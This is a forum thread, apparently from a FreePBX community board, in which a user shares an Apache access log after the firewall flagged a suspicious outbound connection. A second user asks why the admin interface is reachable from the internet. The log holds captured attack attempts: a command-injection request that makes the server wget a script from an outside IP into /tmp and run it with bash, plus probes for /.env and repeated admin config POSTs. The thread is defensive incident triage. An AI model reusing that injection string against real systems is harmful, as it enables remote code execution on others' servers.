Firewall flagged outbound to 144.172.105.25 as suspicious

macjacfish · October 2, 2025, 4:19pm

My firewall flagged as suspicious an outbound connection to 144.172.105.25 from httpd at around 6:30AM. It is contained in a block of GET/PUT actions that also look odd. I’m posting the block here…given the security holes of late…wondering if this is an indication of more problems. If any one has any ideas I’d appreciate knowing about them: found in /var/log/httpd/access_log.

85.237.194.165 - - [02/Oct/2025:05:33:57 -0700] “GET /admin/config.php HTTP/1.1” 200 11744 “-” “-”
85.237.194.165 - - [02/Oct/2025:05:33:57 -0700] “POST /admin/config.php HTTP/1.1” 200 11870 “https://x.x.x.x/admin/config.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0”
124.198.131.112 - - [02/Oct/2025:05:34:00 -0700] “GET / HTTP/1.0” 400 362 “-” “-”
193.24.123.88 - - [02/Oct/2025:05:34:26 -0700] “GET /robots.txt HTTP/1.1” 403 212 “-” “curl/7.29.0”
193.24.123.88 - - [02/Oct/2025:05:35:17 -0700] “-” 408 - “-” “-”
167.71.32.8 - - [02/Oct/2025:05:39:59 -0700] “GET /PBX.php?cmd=wget%20http://45.234.176.202/new/c%20-O%20/tmp/b;bash%20/tmp/b HTTP/1.1” 404 205 “-” “python-requests/2.32.4”
167.71.32.8 - - [02/Oct/2025:05:40:00 -0700] “GET / HTTP/1.0” 400 362 “-” “-”
54.234.157.230 - - [02/Oct/2025:05:41:05 -0700] “GET / HTTP/1.1” 302 - “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36”
176.65.149.195 - - [02/Oct/2025:05:41:17 -0700] “GET /.env HTTP/1.1” 403 206 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3”
127.0.0.1 - - [02/Oct/2025:05:43:26 -0700] “GET /admin/ajax.php?forceRefresh&module=zulu&command=api&query=/user/config/turnsettings HTTP/1.1” 200 416 “-” “-”
185.242.226.107 - - [02/Oct/2025:05:45:03 -0700] “GET / HTTP/1.1” 302 - “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36”
185.242.226.107 - - [02/Oct/2025:05:45:03 -0700] “GET /admin HTTP/1.1” 301 237 “https://x.x.x.x:443/” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36”
185.242.226.107 - - [02/Oct/2025:05:45:03 -0700] “GET /admin/ HTTP/1.1” 302 - “https://x.x.x.x:443/admin” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36”
185.242.226.107 - - [02/Oct/2025:05:45:04 -0700] “GET /admin/config.php HTTP/1.1” 200 11744 “https://x.x.x.x/admin/” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36”
85.237.194.186 - - [02/Oct/2025:05:49:08 -0700] “GET /admin/config.php HTTP/1.1” 200 11744 “-” “-”
85.237.194.186 - - [02/Oct/2025:05:49:09 -0700] “POST /admin/config.php HTTP/1.1” 200 11870 “https://x.x.x.x/admin/config.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0”
185.242.226.107 - - [02/Oct/2025:05:50:18 -0700] “GET /assets/images/badge.png HTTP/1.1” 404 221 “-” “Python/3.7 aiohttp/3.8.1”
185.242.226.107 - - [02/Oct/2025:05:50:18 -0700] “GET /images/favicon.ico HTTP/1.1” 404 216 “-” “Python/3.7 aiohttp/3.8.1”
65.49.1.66 - - [02/Oct/2025:05:58:23 -0700] “\x16\x03\x01” 400 226 “-” “-”
85.237.194.202 - - [02/Oct/2025:06:04:25 -0700] “GET /admin/config.php HTTP/1.1” 200 11744 “-” “-”
85.237.194.202 - - [02/Oct/2025:06:04:26 -0700] “POST /admin/config.php HTTP/1.1” 200 11870 “https://x.x.x.x/admin/config.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0”
45.156.129.133 - - [02/Oct/2025:06:10:46 -0700] “GET / HTTP/1.1” 403 215 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36”
193.32.248.162 - - [02/Oct/2025:06:15:12 -0700] “HEAD / HTTP/1.1” 302 - “-” “Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0”
101.33.81.73 - - [02/Oct/2025:06:17:21 -0700] “GET / HTTP/1.1” 403 215 “-” “Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1”
85.237.194.164 - - [02/Oct/2025:06:19:41 -0700] “GET /admin/config.php HTTP/1.1” 200 11744 “-” “-”
85.237.194.164 - - [02/Oct/2025:06:19:41 -0700] “POST /admin/config.php HTTP/1.1” 200 11870 “https://x.x.x.x/admin/config.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0”
87.236.176.49 - - [02/Oct/2025:06:24:32 -0700] “GET / HTTP/1.1” 400 11 “-” “Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)”
144.172.105.25 - - [02/Oct/2025:06:27:04 -0700] “GET /config/getuser?index=0 HTTP/1.1” 403 216 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0”
85.237.194.196 - - [02/Oct/2025:06:34:53 -0700] “GET /admin/config.php HTTP/1.1” 200 11744 “-” “-”
85.237.194.196 - - [02/Oct/2025:06:34:53 -0700] “POST /admin/config.php HTTP/1.1” 200 11870 “https://x.x.x.x/admin/config.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0”
51.159.23.43 - - [02/Oct/2025:06:36:46 -0700] “GET / HTTP/1.1” 302 - “-” “-”
37.60.141.156 - - [02/Oct/2025:06:40:22 -0700] “GET / HTTP/1.1” 403 215 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246”

BlazeStudios · October 2, 2025, 5:23pm

Why does this look like your admin GUI is open to the world?

macjacfish · October 2, 2025, 5:42pm

While it is limited by Ip’s in freepbx.conf…we use Sangoma Desktop for employee’s in the Philippine’s which need to authenticate against http.

system · November 1, 2025, 5:43pm

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.